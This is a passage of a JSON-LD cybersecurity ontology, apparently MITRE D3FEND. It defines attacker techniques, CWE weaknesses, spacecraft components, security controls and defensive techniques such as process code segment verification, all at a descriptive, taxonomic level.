      "rdfs:subClassOf": [
        {
          "@id": "d3f:ApplicationConfiguration"
        },
        {
          "@id": "_:N80db4facbac949f7add3157ee6081fa1"
        }
      ]
    },
    {
      "@id": "_:N80db4facbac949f7add3157ee6081fa1",
      "@type": "owl:Restriction",
      "owl:onProperty": {
        "@id": "d3f:controls"
      },
      "owl:someValuesFrom": {
        "@id": "d3f:OTControllerOperatingMode"
      }
    },
    {
      "@id": "d3f:ATLASPersistenceTechnique",
      "@type": [
        "owl:Class",
        "owl:NamedIndividual"
      ],
      "d3f:enables": {
        "@id": "d3f:AML.TA0006"
      },
      "rdfs:label": "Persistence Technique - ATLAS",
      "rdfs:subClassOf": [
        {
          "@id": "d3f:ATLASTechnique"
        },
        {
          "@id": "_:Na3f63a622ed24472b868749ef567777c"
        }
      ],
      "skos:prefLabel": "Persistence Technique"
    },
    {
      "@id": "_:Na3f63a622ed24472b868749ef567777c",
      "@type": "owl:Restriction",
      "owl:onProperty": {
        "@id": "d3f:enables"
      },
      "owl:someValuesFrom": {
        "@id": "d3f:AML.TA0006"
      }
    },
    {
      "@id": "d3f:T0891",
      "@type": "owl:Class",
      "d3f:attack-id": "T0891",
      "d3f:definition": "Adversaries may leverage credentials that are hardcoded in software or firmware to gain an unauthorized interactive user session to an asset. Examples of credentials that may be hardcoded in an asset include:",
      "rdfs:label": "Hardcoded Credentials - ATTACK ICS",
      "rdfs:subClassOf": [
        {
          "@id": "d3f:ATTACKICSLateralMovementTechnique"
        },
        {
          "@id": "d3f:ATTACKICSPersistenceTechnique"
        }
      ],
      "skos:prefLabel": "Hardcoded Credentials"
    },
    {
      "@id": "d3f:CWE-450",
      "@type": "owl:Class",
      "d3f:cwe-id": "CWE-450",
      "d3f:definition": "The UI has multiple interpretations of user input but does not prompt the user when it selects the less secure interpretation.",
      "rdfs:label": "Multiple Interpretations of UI Input",
      "rdfs:subClassOf": {
        "@id": "d3f:CWE-357"
      }
    },
    {
      "@id": "d3f:ProcessCodeSegmentVerification",
      "@type": [
        "owl:Class",
        "owl:NamedIndividual",
        "d3f:ProcessCodeSegmentVerification"
      ],
      "d3f:d3fend-id": "D3-PCSV",
      "d3f:definition": "Comparing the \"text\" or \"code\" memory segments to a source of truth.",
      "d3f:kb-article": "## How it works\nA process code segment is an executable portion of computer memory allocated to a particular process. Process Code Segment Verification implements verification to compare a process code segment to some expected value.\n\n### Verification logic\nVerification can occur during application startup, or continuously during execution. The logic which verifies the process code may be separate in a third-party process, embedded in the application itself at compile time, or dynamically linked at runtime.\n\n### System of record\nExamples of systems of record:\n\n * On-disk application binary files or checksums\n * Remotely stored binary data or checksums\n * Embedded binary data or checksums\n\n### Post Verification Actions\nIf the verification function determines a process code segment may have been altered, a capability may invoke Eviction techniques such as **Process Termination** to end the current process, or **Executable Blacklisting** to prevent the executable from launching in the future.\n\n## Considerations\n\n### False positives\n\nFalse positives commonly occur in the case that the layout of code in the process segment is legitimately modified:\n\n*  Operating system features or third-party security software may modify the layout of process code, for example in the defensive technique **Segment Address Offset Randomization**, or in the case that a module is rebased.  \nIn both of these cases, the alteration occurs before the code is fully loaded into memory, and it would be possible to avoid the false positive by securely feeding this constant offset and any relocation data into the verification logic.\n\n* Process code segments may be written to modify themselves or other process code segments; however, this goes against widely-accepted current practices in software development.\n\n### False negatives\n\nFalse negatives can occur via alteration of the verification logic or source of truth, or insufficient verification logic.\n\n* Verification techniques which are executed only locally may be defeated by altering the local verification logic.\n\n* Verification that is run only on a recurring basis could be evaded if the malicious alteration is completed before verification is run.\n\n* Verification that requests an operation to be performed on a subset of the code segment could be evaded by performing that operation on a copy of the relevant bytes of the code segment.\n\n* Verification based on a system of record that can be altered may fail if that system of record is modifiable by a malicious user.",
      "d3f:kb-reference": [
        {
          "@id": "d3f:Reference-Anti-tamperSystemWithSelf-adjustingGuards_ARXANTECHNOLOGIESInc"
        },
        {
          "@id": "d3f:Reference-GuardsForApplicationInSoftwareTamperproofing_PurdueResearchFoundation"
        },
        {
          "@id": "d3f:Reference-SystemAndMethodForDetectingMalwareInjectedIntoMemoryOfAComputingDevice_EndgameInc"
        },
        {
          "@id": "d3f:Reference-SystemAndMethodForValidatingIn-memoryIntegrityOfExecutableFilesToIdentifyMaliciousActivity_EndgameInc"
        },
        {
          "@id": "d3f:Reference-TamperProofMutatingSoftware_ARXANTECHNOLOGIESInc"
        },
        {
          "@id": "d3f:Reference-ThreatDetectionThroughTheAccumulatedDetectionOfThreatCharacteristics_SophosLtd"
        }
      ],
      "d3f:verifies": {
        "@id": "d3f:ProcessCodeSegment"
      },
      "rdfs:label": "Process Code Segment Verification",
      "rdfs:subClassOf": [
        {
          "@id": "d3f:ProcessAnalysis"
        },
        {
          "@id": "_:Ne984e41855d44eefbdb5a75c119d1775"
        }
      ]
    },
    {
      "@id": "_:Ne984e41855d44eefbdb5a75c119d1775",
      "@type": "owl:Restriction",
      "owl:onProperty": {
        "@id": "d3f:verifies"
      },
      "owl:someValuesFrom": {
        "@id": "d3f:ProcessCodeSegment"
      }
    },
    {
      "@id": "d3f:T1578.001",
      "@type": [
        "owl:Class",
        "owl:NamedIndividual"
      ],
      "d3f:attack-id": "T1578.001",
      "d3f:creates": {
        "@id": "d3f:ComputingSnapshot"
      },
      "d3f:definition": "An adversary may create a snapshot or data backup within a cloud account to evade defenses. A snapshot is a point-in-time copy of an existing cloud compute component such as a virtual machine (VM), virtual hard drive, or volume. An adversary may leverage permissions to create a snapshot in order to bypass restrictions that prevent access to existing compute service infrastructure, unlike in [Revert Cloud Instance](https://attack.mitre.org/techniques/T1578/004) where an adversary may revert to a snapshot to evade detection and remove evidence of their presence.",
      "rdfs:label": "Create Snapshot",
      "rdfs:subClassOf": [
        {
          "@id": "d3f:T1578"
        },
        {
          "@id": "_:N567ca99f9d01494db50a80b15ad4d089"
        }
      ]
    },
    {
      "@id": "_:N567ca99f9d01494db50a80b15ad4d089",
      "@type": "owl:Restriction",
      "owl:onProperty": {
        "@id": "d3f:creates"
      },
      "owl:someValuesFrom": {
        "@id": "d3f:ComputingSnapshot"
      }
    },
    {
      "@id": "d3f:NIST_SP_800-53_R5_SA-8_22",
      "@type": [
        "owl:NamedIndividual",
        "d3f:NISTControl"
      ],
      "d3f:control-name": "Security and Privacy Engineering Principles | Accountability and Traceability",
      "d3f:member-of": {
        "@id": "d3f:NIST_SP_800-53_R5"
      },
      "d3f:related": {
        "@id": "d3f:DomainAccountMonitoring"
      },
      "rdfs:label": "SA-8(22)"
    },
    {
      "@id": "d3f:CWE-222",
      "@type": "owl:Class",
      "d3f:cwe-id": "CWE-222",
      "d3f:definition": "The product truncates the display, recording, or processing of security-relevant information in a way that can obscure the source or nature of an attack.",
      "rdfs:label": "Truncation of Security-relevant Information",
      "rdfs:subClassOf": {
        "@id": "d3f:CWE-221"
      }
    },
    {
      "@id": "d3f:Spacecraft",
      "@type": "owl:Class",
      "d3f:definition": "A spacecraft is a vehicle that is designed to fly and operate in outer space. Spacecraft are used for a variety of purposes, including communications, Earth observation, meteorology, navigation, space colonization, planetary exploration, and transportation of humans and cargo.",
      "rdfs:isDefinedBy": {
        "@id": "dbr:Spacecraft"
      },
      "rdfs:label": "Spacecraft",
      "rdfs:subClassOf": [
        {
          "@id": "d3f:Vehicle"
        },
        {
          "@id": "_:Nc10ef487af854cd5a773e6e593f7c9d2"
        },
        {
          "@id": "_:N1fad0f68ee2e46a384fc3e999b256ac8"
        },
        {
          "@id": "_:N13e55bbd2408404a84584e40d7885c4c"
        },
        {
          "@id": "_:Nc89acc20727246ed93ec0a4d36b5dae0"
        },
        {
          "@id": "_:Nf220faa992f24cda9fa04faa6aedf96b"
        },
        {
          "@id": "_:N091c868f843d4c5eb3c39afaacfdd113"
        },
        {
          "@id": "_:N6c5dc59b339c4b5ab8dc78e69b8ca484"
        },
        {
          "@id": "_:N7f4919bb87aa47a5a275c658fe559bb7"
        },
        {
          "@id": "_:Naaaf2136a9444867a3127d3fe0996e02"
        }
      ]
    },
    {
      "@id": "_:Nc10ef487af854cd5a773e6e593f7c9d2",
      "@type": "owl:Restriction",
      "owl:onProperty": {
        "@id": "d3f:contains"
      },
      "owl:someValuesFrom": {
        "@id": "d3f:OnboardComputer"
      }
    },
    {
      "@id": "_:N1fad0f68ee2e46a384fc3e999b256ac8",
      "@type": "owl:Restriction",
      "owl:onProperty": {
        "@id": "d3f:contains"
      },
      "owl:someValuesFrom": {
        "@id": "d3f:Receiver"
      }
    },
    {
      "@id": "_:N13e55bbd2408404a84584e40d7885c4c",
      "@type": "owl:Restriction",
      "owl:onProperty": {
        "@id": "d3f:contains"
      },
      "owl:someValuesFrom": {
        "@id": "d3f:Transmitter"
      }
    },
    {
      "@id": "_:Nc89acc20727246ed93ec0a4d36b5dae0",
      "@type": "owl:Restriction",
      "owl:onProperty": {
        "@id": "d3f:has-operating-mode"
      },
      "owl:someValuesFrom": {
        "@id": "d3f:OperatingMode"
      }
    },
    {
      "@id": "_:Nf220faa992f24cda9fa04faa6aedf96b",
      "@type": "owl:Restriction",
      "owl:onProperty": {
        "@id": "d3f:may-contain"
      },
      "owl:someValuesFrom": {
        "@id": "d3f:BusNetwork"
      }
    },
    {
      "@id": "_:N091c868f843d4c5eb3c39afaacfdd113",
      "@type": "owl:Restriction",
      "owl:onProperty": {
        "@id": "d3f:may-contain"
      },
      "owl:someValuesFrom": {
        "@id": "d3f:GNSSReceiver"
      }
    },
    {
      "@id": "_:N6c5dc59b339c4b5ab8dc78e69b8ca484",
      "@type": "owl:Restriction",
      "owl:onProperty": {
        "@id": "d3f:may-contain"
      },
      "owl:someValuesFrom": {
        "@id": "d3f:HardwareCryptographicModule"
      }
    },
    {
      "@id": "_:N7f4919bb87aa47a5a275c658fe559bb7",
      "@type": "owl:Restriction",
      "owl:onProperty": {
        "@id": "d3f:may-contain"
      },
      "owl:someValuesFrom": {
        "@id": "d3f:Software-definedRadioComputer"
      }
    },
    {
      "@id": "_:Naaaf2136a9444867a3127d3fe0996e02",
      "@type": "owl:Restriction",
      "owl:onProperty": {
        "@id": "d3f:may-contain"
      },
      "owl:someValuesFrom": {
        "@id": "d3f:TransducerSensor"
      }
    },
    {
      "@id": "d3f:EquivalenceMatching",
      "@type": [
        "owl:Class",
        "owl:NamedIndividual"
      ],
      "d3f:d3fend-id": "D3A-EM",
      "d3f:definition": "Equivalence matching is matching two values, which may be bound to variables, to see if they are equivalent.",
      "d3f:kb-article": "## How it works\nEquality is a relationship between two quantities or, more generally, two mathematical expressions, asserting that the quantities have the same value, or that the expressions represent the same mathematical object.\n\nProgramming languages can have multiple senses of equality that may include, but are not limited to:\n\n- Identity: The objects are identical; often indicated by having values indicating the same logical address.\n- Equality: The values of the expressions and properties are equivalent when evaluated; they do not need to have the same logical address.\n\n## References\n1. Equality (mathematics). (2023, May 31). In _Wikipedia_. [Link](https://en.wikipedia.org/wiki/Equality_(mathematics))\n2. Types of Equality. (2007, March 2). In _WikiWikiWeb_. [Link](https://wiki.c2.com/?TypesOfEquality)",
      "rdfs:label": "Equivalence Matching",
      "rdfs:subClassOf": {
        "@id": "d3f:LogicalRules"
      }
    },
    {
      "@id": "d3f:ApplicationUpdateEvent",
      "@type": "owl:Class",
      "d3f:definition": "An event describing changes made to an application, such as updates, reconfigurations, or patch installations, while maintaining its presence on the system.",
      "rdfs:label": "Application Update Event",
      "rdfs:subClassOf": [
        {
          "@id": "d3f:ApplicationEvent"
        },
        {
          "@id": "_:N4a36d37ed1234b0c81187071774f7eb5"
        }
      ]
    },
    {
      "@id": "_:N4a36d37ed1234b0c81187071774f7eb5",
      "@type": "owl:Restriction",
      "owl:onProperty": {
        "@id": "d3f:preceded-by"
      },
      "owl:someValuesFrom": {
        "@id": "d3f:ApplicationInstallationEvent"
      }
    },
    {
      "@id": "d3f:WebScriptFile",
      "@type": [
        "owl:Class",
        "owl:NamedIndividual"
      ],
      "d3f:definition": "A file containing a script in a web-scripting programming language. Web scripts may be present and run on the client or on the server side.",
      "rdfs:label": "Web Script File",
      "rdfs:subClassOf": {
        "@id": "d3f:ExecutableScript"
      },
      "skos:altLabel": "Web Script"
    },
    {
      "@id": "d3f:HardwareDeviceEvent",
      "@type": "owl:Class",
      "d3f:definition": "An event capturing the existence, state, or interaction of hardware or virtual devices within a system. Device events encompass activities such as discovery, connection, disconnection, operational state changes, or configuration modifications, providing visibility into device behavior and health.",
      "rdfs:label": "Hardware Device Event",
      "rdfs:subClassOf": [
        {
          "@id": "d3f:DigitalEvent"
        },
        {
          "@id": "_:N31b641026ebf471d9e897f68844a7bda"
        }
      ]
    },
    {
      "@id": "_:N31b641026ebf471d9e897f68844a7bda",
      "@type": "owl:Restriction",
      "owl:onProperty": {
        "@id": "d3f:has-participant"
      },
      "owl:someValuesFrom": {
        "@id": "d3f:HardwareDevice"
      }
    },
    {
      "@id": "d3f:PhysicalLinkEvent",
      "@type": "owl:Class",
      "d3f:definition": "A discrete event that changes either the presence of the transmission medium or the operational state of a single-hop layer-1 link between two network nodes.",
      "rdfs:label": "Physical Link Event",
      "rdfs:subClassOf": [
        {
          "@id": "d3f:NetworkDeviceEvent"
        },
        {
          "@id": "_:Naf1ffff231bd4b67960a476bcd730719"
        }
      ]
    },
    {
      "@id": "_:Naf1ffff231bd4b67960a476bcd730719",
      "@type": "owl:Restriction",
      "owl:onProperty": {
        "@id": "d3f:has-participant"
      },
      "owl:someValuesFrom": {
        "@id": "d3f:PhysicalLink"
      }
    },
    {
      "@id": "d3f:text",
      "@type": "owl:DatatypeProperty",
      "d3f:definition": "The text of the document (i.e., terms of license.)",
      "rdfs:label": {
        "@language": "en",
        "@value": "text"
      },
      "rdfs:subPropertyOf": {
        "@id": "d3f:d3fend-catalog-data-property"
      }
    },
    {
      "@id": "d3f:IA-0005.02",
      "@type": "owl:Class",
      "d3f:attack-id": "IA-0005.02",
      "d3f:definition": "Docking, berthing, or service capture during on-orbit servicing, assembly, and manufacturing (OSAM) creates a high-trust bridge between vehicles. Threat actors exploit this moment, either by pre-positioning code on a servicing vehicle or by manipulating ground updates to it, so that, once docked, lateral movement occurs across the mechanical/electrical interface. Interfaces may expose power and data umbilicals, standardized payload ports, or gateways into the target’s C&DH or payload networks (e.g., SpaceWire, Ethernet, 1553). Service tools that push firmware, load tables, transfer files, or share time/ephemeris become conduits for staged procedures or implants that execute under maintenance authority. Malware can be timed to activation triggers such as “link up,” “maintenance mode entered,” or specific device enumerations that only appear when docked. Because OSAM operations are scheduled and well-documented, the adversary can align preparation with published timelines, ensuring that the first point of execution coincides with the brief window when cross-vehicle trust is intentionally elevated.",
      "rdfs:label": "Docked Vehicle / OSAM - SPARTA",
      "rdfs:seeAlso": {
        "@id": "https://sparta.aerospace.org/technique/IA-0005/02/"
      },
      "rdfs:subClassOf": {
        "@id": "d3f:IA-0005"
      },
      "skos:prefLabel": "Docked Vehicle / OSAM"
    },
    {
      "@id": "d3f:CWE-1241",
      "@type": "owl:Class",
      "d3f:cwe-id": "CWE-1241",
      "d3f:definition": "The device uses an algorithm that is predictable and generates a pseudo-random number.",
      "rdfs:label": "Use of Predictable Algorithm in Random Number Generator",
      "rdfs:subClassOf": {
        "@id": "d3f:CWE-330"
      }
    },
    {
      "@id": "d3f:Reference-SMBWriteRequest_MITRE",
      "@type": [
        "owl:NamedIndividual",
        "d3f:ExternalKnowledgeBase"
      ],
      "d3f:has-link": {
        "@type": "xsd:anyURI",
        "@value": "https://car.mitre.org/analytics/CAR-2013-05-003/"
      },
      "d3f:kb-abstract": "As described in CAR-2013-01-003, SMB provides a means of remotely managing a file system. Adversaries often use SMB to move laterally to a host. SMB is commonly used to upload files. It may be used for staging in Exfiltration or as a Lateral Movement technique. Unlike SMB Reads, SMB Write requests typically require an additional level of access, resulting in less activity. Focusing on SMB Write activity narrows the field to find techniques that actively change remote hosts, instead of passively reading files.",
      "d3f:kb-author": "",
      "d3f:kb-mitre-analysis": "",
      "d3f:kb-organization": "",
      "d3f:kb-reference-of": {
        "@id": "d3f:IPCTrafficAnalysis"
      },
      "d3f:kb-reference-title": "CAR-2013-05-003: SMB Write Request",
      "rdfs:label": "Reference - CAR-2013-05-003: SMB Write Request - MITRE"
    },
    {
      "@id": "d3f:display-priority",
      "@type": "owl:AnnotationProperty",
      "rdfs:label": "display-priority",
      "rdfs:subPropertyOf": {
        "@id": "d3f:d3fend-display-annotation"
      }
    },
    {
      "@id": "d3f:DialUpModem",
      "@type": "owl:Class",
      "d3f:definition": "A dial-up modem transmits computer data over an ordinary switched telephone line that has not been designed for data use. This contrasts with leased line modems, which also operate over lines provided by a telephone company, but ones which are intended for data use and do not impose the same signaling constraints. The modulated data must fit the frequency constraints of a normal voice audio signal, and the modem must be able to perform the actions needed to connect a call through a telephone exchange, namely: picking up the line, dialing, understanding signals sent back by phone company equipment (dial tone, ringing, busy signal,) and on the far end of the call, the second modem in the connection must be able to recognize the incoming ring signal and answer the line.",
      "rdfs:isDefinedBy": {
        "@id": "http://dbpedia.org/resource/Modem#Dial-up"
      },
      "rdfs:label": "Dial Up Modem",
      "rdfs:subClassOf": {
        "@id": "d3f:Modem"
      }
    },
    {
      "@id": "d3f:Token-basedAuthentication",
      "@type": [
        "owl:Class",
        "owl:NamedIndividual",
        "d3f:Token-basedAuthentication"
      ],
      "d3f:d3fend-id": "D3-TBA",
      "d3f:definition": "Token-based authentication is an authentication protocol where users verify their identity in exchange for a unique access token. Users can then access the website, application, or resource for the life of the token without having to re-enter their credentials.",
      "d3f:kb-article": "## How it works\n\nToken-based authentication starts with a user logging into a system, device or application, typically using a password or a security question. An authorization server validates that initial authentication and then issues an access token, which is a small piece of data that lets a client application make a secure call or signal to an API server. Once this initial token-based authentication protocol is completed, the token works like a stamped ticket: The user can continue to seamlessly access the relevant resources, without re-authenticating, for the duration of the token lifecycle. That lifecycle ends when the user logs out or quits an app — and can also be triggered by a set time-out protocol.\n\n## Considerations:\n\nWhile token-based authentication is undoubtedly a major step above traditional password-based authentication, the token is still considered a “bearer token” — that is, access is granted to whomever holds the token.",
      "d3f:kb-reference": {
        "@id": "d3f:Reference-Entrust-What-Is-Token-Based-Authentication"
      },
      "d3f:uses": {
        "@id": "d3f:AccessToken"
      },
      "rdfs:isDefinedBy": {
        "@id": "https://www.entrust.com/resources/learn/what-is-token-based-authentication"
      },
      "rdfs:label": "Token-based Authentication",
      "rdfs:subClassOf": [
        {
          "@id": "d3f:AgentAuthentication"
        },
        {
          "@id": "_:Nff3f491925c64f5280b6abcab97045de"
        }
      ]
    },
    {
      "@id": "_:Nff3f491925c64f5280b6abcab97045de",
      "@type": "owl:Restriction",
      "owl:onProperty": {
        "@id": "d3f:uses"
      },
      "owl:someValuesFrom": {
        "@id": "d3f:AccessToken"
      }
    },
    {
      "@id": "d3f:CCI-002357_v2022-04-05",
      "@type": [
        "owl:NamedIndividual",
        "d3f:CCIControl"
      ],
      "d3f:contributor": {
        "@id": "d3f:DISA_FSO"
      },
      "d3f:definition": "The information system implements a reference monitor for organization-defined access control policies that is tamperproof.",
      "d3f:member-of": {
        "@id": "d3f:CCICatalog_v2022-04-05"
      },
      "d3f:narrower": {
        "@id": "d3f:UserAccountPermissions"
      },
      "d3f:published": {
        "@type": "xsd:dateTime",
        "@value": "2013-06-25T00:00:00"
      },
      "rdfs:label": "CCI-002357"
    },
    {
      "@id": "d3f:T1574.010",
      "@type": [
        "owl:Class",
        "owl:NamedIndividual"
      ],
      "d3f:attack-id": "T1574.010",
      "d3f:definition": "Adversaries may execute their own malicious payloads by hijacking the binaries used by services. Adversaries may use flaws in the permissions of Windows services to replace the binary that is executed upon service start. These service processes may automatically execute specific binaries as part of their functionality or to perform other actions. If the permissions on the file system directory containing a target binary, or permissions on the binary itself are improperly set, then the target binary may be overwritten with another binary using user-level permissions and executed by the original process. If the original process and thread are running under a higher permissions level, then the replaced binary will also execute under higher-level permissions, which could include SYSTEM.",
      "d3f:modifies": {
        "@id": "d3f:ServiceApplication"
      },
      "rdfs:label": "Services File Permissions Weakness",
      "rdfs:subClassOf": [
        {
          "@id": "d3f:T1574"
        },
        {
          "@id": "_:Ndb67f3809dfc4dca8d1e7969a610660f"
        }
      ],
      "skos:altLabel": "Service Registry Permissions Weakness"
    },
    {
      "@id": "_:Ndb67f3809dfc4dca8d1e7969a610660f",
      "@type": "owl:Restriction",
      "owl:onProperty": {
        "@id": "d3f:modifies"
      },
      "owl:someValuesFrom": {
        "@id": "d3f:ServiceApplication"
      }
    },
    {
      "@id": "d3f:T1103",
      "@type": "owl:Class",
      "d3f:attack-id": "T1103",
      "d3f:definition": "Dynamic-link libraries (DLLs) that are specified in the AppInit_DLLs value in the Registry keys <code>HKEY_LOCAL_MACHINE\\Software\\Microsoft\\Windows NT\\CurrentVersion\\Windows</code> or <code>HKEY_LOCAL_MACHINE\\Software\\Wow6432Node\\Microsoft\\Windows NT\\CurrentVersion\\Windows</code> are loaded by user32.dll into every process that loads user32.dll. In practice this is nearly every program, since user32.dll is a very common library. (Citation: Elastic Process Injection July 2017) Similar to [Process Injection](https://attack.mitre.org/techniques/T1055), these values can be abused to obtain persistence and privilege escalation by causing a malicious DLL to be loaded and run in the context of separate processes on the computer. (Citation: AppInit Registry)",
      "owl:deprecated": true,
      "rdfs:comment": "This technique has been revoked by T1546.010",
      "rdfs:label": "AppInit DLLs",
      "rdfs:seeAlso": {
        "@id": "d3f:T1546.010"
      },
      "rdfs:subClassOf": [
        {
          "@id": "d3f:PersistenceTechnique"
        },
        {
          "@id": "d3f:PrivilegeEscalationTechnique"
        }
      ]
    },
    {
      "@id": "d3f:CWE-1428",
      "@type": "owl:Class",
      "d3f:cwe-id": "CWE-1428",
      "d3f:definition": "The product provides or relies on use of HTTP communications when HTTPS is available.",
      "rdfs:label": "Reliance on HTTP instead of HTTPS",
      "rdfs:subClassOf": {
        "@id": "d3f:CWE-319"
      }
    },
    {
      "@id": "d3f:WindowsQueryPerformanceCounter",
      "@type": [
        "owl:Class",
        "owl:NamedIndividual"
      ],
      "d3f:definition": "Retrieves the current value of the performance counter, which is a high resolution (<1us) time stamp that can be used for time-interval measurements.",
      "d3f:invokes": {
        "@id": "d3f:WindowsNtQuerySystemTime"
      },
      "rdfs:isDefinedBy": {
        "@id": "https://learn.microsoft.com/en-us/windows/win32/api/profileapi/nf-profileapi-queryperformancecounter"
      },
      "rdfs:label": "Windows QueryPerformanceCounter",
      "rdfs:subClassOf": [
        {
          "@id": "d3f:OSAPIGetSystemTime"
        },
        {
          "@id": "_:N1d469a8fdc114f8ca0280a7aa3ec6a99"
        }
      ]
    },
    {
      "@id": "_:N1d469a8fdc114f8ca0280a7aa3ec6a99",
      "@type": "owl:Restriction",
      "owl:onProperty": {
        "@id": "d3f:invokes"
      },
      "owl:someValuesFrom": {
        "@id": "d3f:WindowsNtQuerySystemTime"
      }
    },
    {
      "@id": "d3f:T1674",
      "@type": "owl:Class",
      "d3f:attack-id": "T1674",
      "d3f:definition": "Adversaries may simulate keystrokes on a victim’s computer by various means to perform any type of action on behalf of the user, such as launching the command interpreter using keyboard shortcuts,  typing an inline script to be executed, or interacting directly with a GUI-based application.  These actions can be preprogrammed into adversary tooling or executed through physical devices such as Human Interface Devices (HIDs).",
      "rdfs:label": "Input Injection",
      "rdfs:subClassOf": {
        "@id": "d3f:ExecutionTechnique"
      }
    },
    {
      "@id": "d3f:ExfiltrationTechnique",
      "@type": [
        "owl:Class",
        "owl:NamedIndividual"
      ],
      "d3f:definition": "The adversary is trying to steal data.",
      "d3f:enables": {
        "@id": "d3f:TA0010"
      },
      "rdfs:label": "Exfiltration Technique",
      "rdfs:subClassOf": [
        {
          "@id": "d3f:ATTACKEnterpriseTechnique"
        },
        {
          "@id": "d3f:OffensiveTechnique"
        },
        {
          "@id": "_:N6fa50a8e13c34e0ca8ad7727eea05e9d"
        }
      ]
    },
    {
      "@id": "_:N6fa50a8e13c34e0ca8ad7727eea05e9d",
      "@type": "owl:Restriction",
      "owl:onProperty": {
        "@id": "d3f:enables"
      },
      "owl:someValuesFrom": {
        "@id": "d3f:TA0010"
      }
    },
    {
      "@id": "d3f:Reference-MethodAndApparatusForNetworkFraudDetectionAndRemediationThroughAnalytics_IdaptiveLLC",
      "@type": [
        "owl:NamedIndividual",
        "d3f:PatentReference"
      ],
      "d3f:has-link": {
        "@type": "xsd:anyURI",
        "@value": "https://patents.google.com/patent/US20190081968A1/en"
      },
      "d3f:kb-abstract": "A system and method for assessing the identity fraud risk of an entity's (a user's, computer process's, or device's) behavior within a computer network and then to take appropriate action. The system uses real-time machine learning for its assessment. It records the entity's log-in behavior (conditions at log-in) and behavior once logged in to create an entity profile that helps identify behavior patterns. The system compares new entity behavior with the entity profile to determine a risk score and a confidence level for the behavior. If the risk score and confidence level indicate a credible identity fraud risk at log-in, the system can require more factors of authentication before log-in succeeds. If the system detects risky behavior after log-in, it can take remedial action such as ending the entity's session, curtailing the entity's privileges, or notifying a human administrator.",
      "d3f:kb-author": "Yanlin Wang; Weizhi Li",
      "d3f:kb-mitre-analysis": "This patent describes determining a confidence score to detect anomalies in user activity based on comparing a user's behavior profile with current user activity events.  The following types of events are used to develop a user entity profile:\n\n* logon and logoff times and locations\n* starting or ending applications\n* reading or writing files\n* changing an entity's authorization\n* monitoring network traffic\n\nUser events that deviate from the entity profile over a certain threshold trigger a remedial action.",
      "d3f:kb-organization": "Idaptive LLC",
      "d3f:kb-reference-of": [
        {
          "@id": "d3f:AuthenticationEventThresholding"
        },
        {
          "@id": "d3f:AuthorizationEventThresholding"
        },
        {
          "@id": "d3f:ResourceAccessPatternAnalysis"
        },
        {
          "@id": "d3f:SessionDurationAnalysis"
        },
        {
          "@id": "d3f:UserGeolocationLogonPatternAnalysis"
        }
      ],
      "d3f:kb-reference-title": "Method and Apparatus for Network Fraud Detection and Remediation Through Analytics",
      "rdfs:label": "Reference - Method and Apparatus for Network Fraud Detection and Remediation Through Analytics - Idaptive LLC"
    },
    {
      "@id": "d3f:T1156",
      "@type": "owl:Class",
      "d3f:attack-id": "T1156",
      "d3f:definition": "Adversaries may establish persistence through executing malicious commands triggered by a user’s shell. User shells execute several configuration scripts at different points throughout the session based on events. For example, when a user opens a command line interface or remotely logs in (such as SSH) a login shell is initiated. The login shell executes scripts from the system (/etc) and the user’s home directory (~/) to configure the environment. All login shells on a system use <code>/etc/profile</code> when initiated. These configuration scripts run at the permission level of their directory and are often used to set environment variables, create aliases, and customize the user’s environment. When the shell exits or terminates, additional shell scripts are executed to ensure the shell exits appropriately.",
      "owl:deprecated": true,
      "rdfs:comment": "This technique has been revoked by T1546.004",
      "rdfs:label": "Malicious Shell Modification",
      "rdfs:seeAlso": {
        "@id": "d3f:T1546.004"
      },
      "rdfs:subClassOf": {
        "@id": "d3f:PersistenceTechnique"
      }
    },
    {
      "@id": "d3f:LinuxPtraceArgumentPTRACEPEEKTEXT",
      "@type": "owl:Class",
      "d3f:definition": "Read a word at the address addr in the tracee's memory, returning the word as the result of the ptrace() call.",
      "rdfs:isDefinedBy": {
        "@id": "https://man7.org/linux/man-pages/man2/ptrace.2.html"
      },
      "rdfs:label": "Linux Ptrace Argument PTRACE_PEEKTEXT",
      "rdfs:subClassOf": {
        "@id": "d3f:OSAPIReadMemory"
      }
    },
    {
      "@id": "d3f:TimerExpirationEvent",
      "@type": "owl:Class",
      "d3f:definition": "An event in which a software timer reaches its configured duration and triggers associated actions (callbacks, interrupts, or signals).",
      "rdfs:label": "Timer Expiration Event",
      "rdfs:subClassOf": {
        "@id": "d3f:SoftwareTimerEvent"
      }
    },
    {
      "@id": "d3f:CWE-1330",
      "@type": "owl:Class",
      "d3f:cwe-id": "CWE-1330",
      "d3f:definition": "Confidential information stored in memory circuits is readable or recoverable after being cleared or erased.",
      "rdfs:label": "Remanent Data Readable after Memory Erase",
      "rdfs:subClassOf": {
        "@id": "d3f:CWE-1301"
      }
    },
    {
      "@id": "d3f:ContainerImage",
      "@type": [
        "owl:Class",
        "owl:NamedIndividual"
      ],
      "d3f:definition": "A container is a standard unit of software that packages up code and all its dependencies so the application runs quickly and reliably from one computing environment to another. A Docker container image is a lightweight, standalone, executable package of software that includes everything needed to run an application: code, runtime, system tools, system libraries and settings.\n\nContainer images become containers at runtime and in the case of Docker containers - images become containers when they run on Docker Engine. Available for both Linux and Windows-based applications, containerized software will always run the same, regardless of the infrastructure. Containers isolate software from its environment and ensure that it works uniformly despite differences for instance between development and staging.",
      "rdfs:isDefinedBy": {
        "@id": "https://www.docker.com/resources/what-container"
      },
      "rdfs:label": "Container Image",
      "rdfs:seeAlso": {
        "@id": "https://schema.ocsf.io/objects/image"
      },
      "rdfs:subClassOf": [
        {
          "@id": "d3f:ComputingImage"
        },
        {
          "@id": "d3f:SoftwarePackage"
        }
      ]
    },
    {
      "@id": "d3f:T0836",
      "@type": "owl:Class",
      "d3f:attack-id": "T0836",
      "d3f:definition": "Adversaries may modify parameters used to instruct industrial control system devices. These devices operate via programs that dictate how and when to perform actions based on such parameters. Such parameters can determine the extent to which an action is performed and may specify additional options. For example, a program on a control system device dictating motor processes may take a parameter defining the total number of seconds to run that motor.",
      "rdfs:label": "Modify Parameter - ATTACK ICS",
      "rdfs:subClassOf": {
        "@id": "d3f:ATTACKICSImpairProcessControlTechnique"
      },
      "skos:prefLabel": "Modify Parameter"
    },
    {
      "@id": "d3f:ShortcutFile",
      "@type": "owl:Class",
